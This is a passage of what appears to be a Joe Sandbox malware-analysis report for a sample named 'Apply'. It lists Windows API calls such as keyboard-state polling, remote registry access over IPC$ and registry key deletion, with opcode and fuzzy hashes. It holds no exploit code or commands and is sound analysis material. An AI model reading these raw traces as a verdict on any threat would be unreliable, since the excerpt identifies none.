                                                    • CharUpperBuffW.USER32(?,00000000), ref: 008B50DA
                                                    • _wcsstr.LIBVCRUNTIME ref: 008B510F
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 008B5147
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 008B5180
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 008B51DA
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 008B520C
                                                    • GetWindowRect.USER32(?,?), ref: 008B5284
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                    • String ID: ThumbnailClass
                                                    • API String ID: 1311036022-1241985126
                                                    • Opcode ID: ab68e09ddc36bb7ddad1094bb7a8863df7d6f67232a0c943f1f62b2bfa6ec6a4
                                                    • Instruction ID: 6540008cefa625861881ffc66822ac1fb19574fe3b30e9f70d5caa91acfd6045
                                                    • Opcode Fuzzy Hash: ab68e09ddc36bb7ddad1094bb7a8863df7d6f67232a0c943f1f62b2bfa6ec6a4
                                                    • Instruction Fuzzy Hash: 1591F831104B07AFDB08DF28C994BEAB7A9FF55304F004519FA9AC6291EB31ED56CB91
                                                    APIs
                                                      • Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008E9446
                                                    • GetFocus.USER32 ref: 008E9456
                                                    • GetDlgCtrlID.USER32(00000000), ref: 008E9461
                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 008E9509
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 008E95BB
                                                    • GetMenuItemCount.USER32(?), ref: 008E95D8
                                                    • GetMenuItemID.USER32(?,00000000), ref: 008E95E8
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 008E961A
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 008E965C
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008E968D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                    • String ID: 0
                                                    • API String ID: 1026556194-4108050209
                                                    • Opcode ID: b5ef7a6e889004c965bd5f69e348079a8d0f148cedc9b9e0ce231d6b89fc01f0
                                                    • Instruction ID: ba6a6f6e9152578cdfad99ec5a33708a1903c3243b91de8604631120fb7e9ab0
                                                    • Opcode Fuzzy Hash: b5ef7a6e889004c965bd5f69e348079a8d0f148cedc9b9e0ce231d6b89fc01f0
                                                    • Instruction Fuzzy Hash: 5C81B3715083819FD711CF2AC884A6B7BE8FF9A314F04051EF989D7291D7B0D945CBA2
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(009229B0,000000FF,00000000,00000030), ref: 008BC6AD
                                                    • SetMenuItemInfoW.USER32(009229B0,00000004,00000000,00000030), ref: 008BC6E2
                                                    • Sleep.KERNEL32(000001F4), ref: 008BC6F4
                                                    • GetMenuItemCount.USER32(?), ref: 008BC73A
                                                    • GetMenuItemID.USER32(?,00000000), ref: 008BC757
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 008BC783
                                                    • GetMenuItemID.USER32(?,?), ref: 008BC7CA
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008BC810
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BC825
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BC846
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                    • String ID: 0
                                                    • API String ID: 1460738036-4108050209
                                                    • Opcode ID: 77ae6e2129c6dd5bcbf4c11ddf0ecc807746fb323b31e6f6f25195dcaaef1f93
                                                    • Instruction ID: acbd2b2d5a0da8ad6a7d9537c9eab4158444679f9778d3441f8aabe758d5122c
                                                    • Opcode Fuzzy Hash: 77ae6e2129c6dd5bcbf4c11ddf0ecc807746fb323b31e6f6f25195dcaaef1f93
                                                    • Instruction Fuzzy Hash: CA617DB090024AABDF11CF68D888AFF7BB8FB05308F144169E851E7351CB75AD15CBA1
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008BE1FE
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008BE224
                                                    • _wcslen.LIBCMT ref: 008BE22E
                                                    • _wcsstr.LIBVCRUNTIME ref: 008BE27E
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008BE29A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 1939486746-1459072770
                                                    • Opcode ID: 2e021709636577a77be7b9592b99e059482fbb4f0088c751ccbc781eab4b0d92
                                                    • Instruction ID: ef9c38da17704fe2a3add30ac14c221ea38a7009db20879d39e68e457ed81fc1
                                                    • Opcode Fuzzy Hash: 2e021709636577a77be7b9592b99e059482fbb4f0088c751ccbc781eab4b0d92
                                                    • Instruction Fuzzy Hash: A6411832A00304BEDB15A7689C87EFF77ACFF95710F508065F909E6282EB75D90196B2
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 008DD3E2
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 008DD40B
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 008DD4C6
                                                      • Part of subcall function 008DD3B2: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 008DD428
                                                      • Part of subcall function 008DD3B2: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 008DD43B
                                                      • Part of subcall function 008DD3B2: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008DD44D
                                                      • Part of subcall function 008DD3B2: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 008DD483
                                                      • Part of subcall function 008DD3B2: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 008DD4A6
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 008DD471
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2734957052-4033151799
                                                    • Opcode ID: befd33f9f70461246037e79cbb75b6eb2963bf9b4023c8fe64f59a43a7cafb8d
                                                    • Instruction ID: a74e7b2b2603e3efa9616e0c7e8ac95993e5cc8ddf8b0f67e5a9f39cad0a9465
                                                    • Opcode Fuzzy Hash: befd33f9f70461246037e79cbb75b6eb2963bf9b4023c8fe64f59a43a7cafb8d
                                                    • Instruction Fuzzy Hash: 1B316F71901229BBDB209B64DC88EFFBB7DFF45754F004266B805E7240DB749E4A9AA0
                                                    APIs
                                                    • timeGetTime.WINMM ref: 008BECF5
                                                      • Part of subcall function 0086EF0E: timeGetTime.WINMM(?,?,008BED15), ref: 0086EF12
                                                    • Sleep.KERNEL32(0000000A), ref: 008BED22
                                                    • EnumThreadWindows.USER32(?,Function_0006ECA6,00000000), ref: 008BED46
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008BED68
                                                    • SetActiveWindow.USER32 ref: 008BED87
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008BED95
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 008BEDB4
                                                    • Sleep.KERNEL32(000000FA), ref: 008BEDBF
                                                    • IsWindow.USER32 ref: 008BEDCB
                                                    • EndDialog.USER32(00000000), ref: 008BEDDC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: b68c2bd061744a0a9abfad6fce66f26694f4019a86ac3b476731a92d7c3610d7
                                                    • Instruction ID: f10d5baedd49a1ebe5ac993b3c9341c4920bd3988b8e0c386386a0cd881ecb18
                                                    • Opcode Fuzzy Hash: b68c2bd061744a0a9abfad6fce66f26694f4019a86ac3b476731a92d7c3610d7
                                                    • Instruction Fuzzy Hash: 1821A170624389BFEB205F78ECC9BA53B6DFB49B45F045014F402CA371CBB58C49AA51
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008BF09E
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008BF0B4
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008BF0C5
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008BF0D7
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008BF0E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: SendString$_wcslen
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2420728520-1007645807
                                                    • Opcode ID: 053db689a5fb19100c0827b409283483c71dbcd980aa597d0eb87343d887dd03
                                                    • Instruction ID: 023ac3a5662aa0080f03200c14ac514bf74644e489f3b00ac98ffe18e8de43b9
                                                    • Opcode Fuzzy Hash: 053db689a5fb19100c0827b409283483c71dbcd980aa597d0eb87343d887dd03
                                                    • Instruction Fuzzy Hash: FA119431A9015E79D720B2A59C49EFFAB7CFBD1B14F000465B911E20D2DE601D49C9A1
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 008BA713
                                                    • SetKeyboardState.USER32(?), ref: 008BA77E
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 008BA79E
                                                    • GetKeyState.USER32(000000A0), ref: 008BA7B5
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 008BA7E4
                                                    • GetKeyState.USER32(000000A1), ref: 008BA7F5
                                                    • GetAsyncKeyState.USER32(00000011), ref: 008BA821
                                                    • GetKeyState.USER32(00000011), ref: 008BA82F
                                                    • GetAsyncKeyState.USER32(00000012), ref: 008BA858
                                                    • GetKeyState.USER32(00000012), ref: 008BA866
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 008BA88F
                                                    • GetKeyState.USER32(0000005B), ref: 008BA89D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: f49fcbb860dc9e75396023f4b69b353ed21a2e04273c0c1c362bab7eb5497e94
                                                    • Instruction ID: f4674e4b97776c0707c2a44f34ac16a581b0187b9added4dcdc7e4b6c8628552
                                                    • Opcode Fuzzy Hash: f49fcbb860dc9e75396023f4b69b353ed21a2e04273c0c1c362bab7eb5497e94
                                                    • Instruction Fuzzy Hash: D851DC609047C829FB39DB6488557EABFB4FF12380F0845A9C5C29A7C2DA54DE4CCB63
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 008B63DB
                                                    • GetWindowRect.USER32(00000000,?), ref: 008B63F4
                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 008B6452
                                                    • GetDlgItem.USER32(?,00000002), ref: 008B6462
                                                    • GetWindowRect.USER32(00000000,?), ref: 008B6474
                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 008B64C8
                                                    • GetDlgItem.USER32(?,000003E9), ref: 008B64D6
                                                    • GetWindowRect.USER32(00000000,?), ref: 008B64E8
                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 008B652A
                                                    • GetDlgItem.USER32(?,000003EA), ref: 008B653D
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008B6553
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 008B6560
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 7a63adaa1f6a1adc58f753dcaa61cf3912ab81274bc9f51d12609afc4cb8c3c4
                                                    • Instruction ID: 135cbe9ac93af6ffcceb44398fa3c46d340e509cfec1b1e57f465a63df3e0a5e
                                                    • Opcode Fuzzy Hash: 7a63adaa1f6a1adc58f753dcaa61cf3912ab81274bc9f51d12609afc4cb8c3c4
                                                    • Instruction Fuzzy Hash: CE510071A00705AFDF18CF68DD85AAEBBB5FB48310F108129F519E7294E774AD54CB50
                                                    APIs
                                                      • Part of subcall function 00869287: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00868F0D,?,00000000,?,?,?,?,00868EDF,00000000,?), ref: 008692EA
                                                    • DestroyWindow.USER32(?), ref: 00868FA6
                                                    • KillTimer.USER32(00000000,?,?,?,?,00868EDF,00000000,?), ref: 00869040
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 008A7019
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00868EDF,00000000,?), ref: 008A7047
                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00868EDF,00000000,?), ref: 008A705E
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00868EDF,00000000), ref: 008A707A
                                                    • DeleteObject.GDI32(00000000), ref: 008A708C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    • Opcode ID: 4b4e2e5952f409961dc6b4a8a2b11624f2dd9c813ec0d71b08589a5ddf74764f
                                                    • Instruction ID: aae464118e2b81ac83bc145bf4cf4e0a1479661ba6ec4ca50c257f1104d161fe
                                                    • Opcode Fuzzy Hash: 4b4e2e5952f409961dc6b4a8a2b11624f2dd9c813ec0d71b08589a5ddf74764f
                                                    • Instruction Fuzzy Hash: 8F61BF31519B01EFEB359F14DE48B2977F2FB41316F154618E086CAAA0CB71A886EF81
                                                    APIs
                                                      • Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008B0E29
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008B0E45
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008B0E61
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008B0E8B
                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 008B0EB3
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008B0EBE
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008B0EC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 323675364-22481851
                                                    • Opcode ID: 7e20205f6a9545b05bb95afa5684ef343729d81e2d1e044d6c50218ea75d554c
                                                    • Instruction ID: 83df025756880c1c66414c0cfb9b8660aa2064b8b5efd22aaeec30abdd60dabe
                                                    • Opcode Fuzzy Hash: 7e20205f6a9545b05bb95afa5684ef343729d81e2d1e044d6c50218ea75d554c
                                                    • Instruction Fuzzy Hash: 12410972D1022DABCF15EBA4DC958EEB778FF14311F44456AE805E7261EB309E09CB91
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008E47FB
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 008E4802
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008E4815
                                                    • SelectObject.GDI32(00000000,00000000), ref: 008E481D
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 008E4828
                                                    • DeleteDC.GDI32(00000000), ref: 008E4832
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 008E483C
                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 008E4852
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 008E485E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: b2755fe23109bea0f2d45fdede9b723aca6fb1fba7544e923e2a5716d50d0c8e
                                                    • Instruction ID: 5b0deba5ed550623fcf88f92e7e52ad4ce6765726d8db876ab9a20aec58966ac
                                                    • Opcode Fuzzy Hash: b2755fe23109bea0f2d45fdede9b723aca6fb1fba7544e923e2a5716d50d0c8e
                                                    • Instruction Fuzzy Hash: DA316031100299AFDF119F65DC48FDA3BA9FF0A724F110225FA28EA1A0C775D855DB94
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 008C8262
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008C82FE
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 008C8312
                                                    • CoCreateInstance.OLE32(008F0CF0,00000000,00000001,00917E7C,?), ref: 008C835E
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008C83E3
                                                    • CoTaskMemFree.OLE32(?,?), ref: 008C843B
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 008C84C6
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008C84E9
                                                    • CoTaskMemFree.OLE32(00000000), ref: 008C84F0
                                                    • CoTaskMemFree.OLE32(00000000), ref: 008C8545
                                                    • CoUninitialize.OLE32 ref: 008C854B
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                    • String ID:
                                                    • API String ID: 2762341140-0
                                                    • Opcode ID: ddcd0b612c45c3750dd732450858ad13cfb7b2de675b107b6e53b7d528ea1b02
                                                    • Instruction ID: 6526e40259ea723b209efc317faa225d3eef96237e2e68689fb5f896fd030e43
                                                    • Opcode Fuzzy Hash: ddcd0b612c45c3750dd732450858ad13cfb7b2de675b107b6e53b7d528ea1b02
                                                    • Instruction Fuzzy Hash: A0C1FB75A00219EFCB14DFA4C884EAEBBB5FF48344B1484A9E915DB361DB30EE45CB91
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008B0136
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 008B018F
